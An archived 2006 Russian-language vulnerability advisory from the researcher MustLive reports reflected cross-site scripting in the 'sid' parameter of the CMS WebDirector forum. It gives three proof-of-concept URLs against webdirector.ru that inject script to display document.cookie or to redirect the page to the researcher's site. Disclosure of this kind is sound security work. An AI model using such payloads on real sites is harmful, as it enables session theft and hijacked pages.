Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14087
HistoryAug 30, 2006 - 12:00 a.m.

Уязвимости в CMS WebDirector

2006-08-3000:00:00
vulners.com
10

Здравствуйте администрация security.nnov.ru!

Решил прислать вам в багтрак информацию об уязвимости в CMS WebDirector.

О которой я уже упомянул у себя на сайте (http://websecurity.com.ua/93/) и сообщил
администрации сайта webdirector.ru и разработчикам CMS.

В начале этого месяца я заходил на сайт webdirector.ru, за дополнительной информацией о
данной CMS, и нашёл Cross-Site Scripting уязвимость (в двух параметрах).

XSS:

http://www.webdirector.ru/forum.html?sid=root_2c8f_%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.webdirector.ru/forum.html?sid=root_%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.webdirector.ru/forum.html?sid=root_%22%3Cscript%3Edocument.location%3D'http://websecurity.com.ua'%3C/script%3E

Разработчикам WebDirector стоит уделять внимание безопасности своего сайта и своей
системы.

Best wishes & regards,
MustLive
Администратор сайтов
http://mlfun.org.ua
http://websecurity.com.ua